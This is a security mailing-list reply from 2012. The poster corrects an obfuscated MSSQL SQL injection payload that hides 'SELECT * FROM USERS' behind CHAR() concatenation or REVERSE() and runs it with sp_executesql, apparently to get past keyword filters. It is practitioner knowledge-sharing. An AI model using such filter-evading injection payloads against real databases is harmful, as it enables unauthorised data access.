PaulDotCom mailing list archives
Re: A fun Sql injection trick (MSSQL)
From: Pat <nutjob.ie () gmail com>
Date: Sat, 9 Jun 2012 13:08:14 +1000
Hi Robin, You are 100pc correct. The script is generating a + after the first = I will fix this later tonight. Corrected syntax --Select * From Users DECLARE @myvar nchar(50)= CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+ CHAR(67)+ CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+ CHAR(111)+ CHAR(109)+ CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+ CHAR(83); exec sp_executesql @myvar Apologies for the confusion. Regards, Pat On Fri, Jun 8, 2012 at 6:37 PM, Robin Wood <robin () digininja org> wrote:
On 8 June 2012 03:43, Pat <nutjob.ie () gmail com> wrote:Hi all, I came from a developer background and found myself inbusiness developmentso in order to get my nerd on I started a blog as I do have the oddbrainfart. Thought id share one of my favourites as I have seen a few posts outtheresaying obfuscation of SQL injection is not possible... Example 1 --MSSQL --SELECT * FROM USERS; 'DECLARE @myvar nchar(50)= REVERSE(';sresu morf * tceles'); exec sp_executesql @myvar ;-- Example 2 --MSSQL --SELECT * FROM USERS; DECLARE @myvar nchar(50)= + CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+ CHAR(67)+ CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+ CHAR(111)+ CHAR(109)+ CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+ CHAR(83); exec sp_executesql @myvarIs there a rogue + after the = in this example? RobinFor a script to generate example 2 see http://stolenpackets.net/?p=11 Regards, Pat _______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- A fun Sql injection trick (MSSQL) Pat (Jun 07)
- Re: A fun Sql injection trick (MSSQL) Robin Wood (Jun 08)
- Re: A fun Sql injection trick (MSSQL) Pat (Jun 09)
- Re: A fun Sql injection trick (MSSQL) Robin Wood (Jun 08)